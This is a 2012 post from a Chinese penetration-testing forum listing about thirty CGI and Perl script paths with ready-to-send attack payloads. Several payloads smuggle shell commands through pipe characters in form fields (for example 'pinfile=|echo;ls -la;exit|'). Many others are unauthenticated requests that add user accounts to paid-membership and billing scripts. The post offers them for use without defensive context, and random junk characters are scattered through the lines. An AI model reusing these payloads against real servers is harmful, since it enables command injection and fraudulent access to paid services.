中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞＋使用方法 [打印本页]

---

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞＋使用方法
==============================

/smspass.pl
username=username&password=password
7 y+ ]! `2 F$ B& z/ k, V
/index.cgi
wei=ren&gen=command
( X" z( l7 v2 q% t" ?" M8 O: y
9 V) K! I. y. ^/passmaster.cgi
# \' ?2 f9 A; r3 q) d/ ]) C% aAction=Add&Username=Username&Password=Password

& }" b- h% [, H, m2 u2 u4 [/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
1 [- G2 q8 t  o/ Z! K6 a
/form.cgi
' R- y9 E3 Z% T/ Z- p* o6 B4 }name=xxxx&email=email&subject=xxxx&response=|echo;ls|

" G4 d* Z3 h9 j+ F" ~" L! o/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
* k7 N+ q" [# J4 ?2 b  z7 R
& ^. R. L% b" a' e/ccbill-local.asp
* M- P+ O5 y- z% q3 q( p% L# J: Ypost_values=username:password

/count.cgi
: s1 K0 Y1 J* ^8 y& T# Mpinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
% p" `" x5 q+ Wsearchoption=1&searchfor=|echo;ls -al;exit|
& z) m& A0 ?; f* ^) C* T" ~. {, Z
/verotelrum.pl
& m: j( v9 Q+ ^8 U5 `* G" y; }; vvercode=username:password:dseegsow:add:amount<&30>
2 t$ K- p* p; ^* ?: o2 j6 Q( Z
/af.cgi
4 Q& _( x2 F( O5 ]7 o9 t_browser_out=|echo;ls -la;exit;|

' |8 E$ H& n) q/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
( H; P; e% q+ o, ?8 m9 [
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
3 L+ K2 L: z8 `- v
3 P( `/ ]0 f) [& |& v/probecontrol.cgi
2 c- k8 y3 k  R7 z: {command=enable&username=username&password=password

" U9 s/ `9 t; K$ t/recon.cgi
1 ^- f) Q# k% q* |/ g- lsearchoption=3&searchfor=echo;ls -la;exit

# r5 N1 Z0 @2 g/ W" p' O) u/htadd.pl
' R" I6 Q# P$ r* l6 ?configfile=|echo; ls -alt; exit
. U  o, x8 W+ K) c
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
+ g$ V/ }0 E& z4 R  l, h
5 O- }) A8 a( O' i0 g/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
0 }: y4 ~! x4 ]% ]9 p- m/ r
/cpay.cgi
7 E1 `. B) ?! E5 c# {command=add_member&username=username(EMAIL)&password=password(DES)
8 A' d& c8 v- v( t" Q
  E( T* a8 t* W' n/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

+ t8 Y1 p# q% u/usercontrol.cgi
. n' c3 J0 t: B+ l# R. Rcommand=enable&username=USER&password=PASS

( J: e$ Q* W3 B/ z. @7 N8 z, i" P+ N5 J3 L/globoSALErum.cgi
& e# R4 [& r# U  V( U% S; Q7 Baction=ADD&seccode=seccode&login=username&password=password
# |6 j9 O8 C- d: q1 G: l# Q8 D( B
/addusr.pl
/ o- M3 S) _. Z8 Q7 x3 K; Yuser=USER&pass=PASS&confirm=PASS

7 O9 |4 z. |$ N, G7 U4 `* _/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
2 L6 G0 O( i$ f! K+ qpinfile=|echo;pwd;exit|
( C2 ~: M4 k& x3 s: a) F
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
6 ?4 L5 }- \+ A) L! v( lusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

8 ~+ @1 B/ J" F/af.cgi
/env.cgi
9 h, V, C9 X' m7 I2 ~! L' x  fADD+;echo;pwd;exit
& j& y5 U) H. r" v
/count.cgi
( Q: a2 t5 [" R; [, e/ ^2 B* s  Fpinfile=|echo;pwd;exit|
3 F1 J' e+ K% ]! B2 ~' s- W7 S
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30
) M  u! g+ U- e# |+ K* W8 t/ R
==============================
. x% h3 `# @* I" f3 {# ?

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2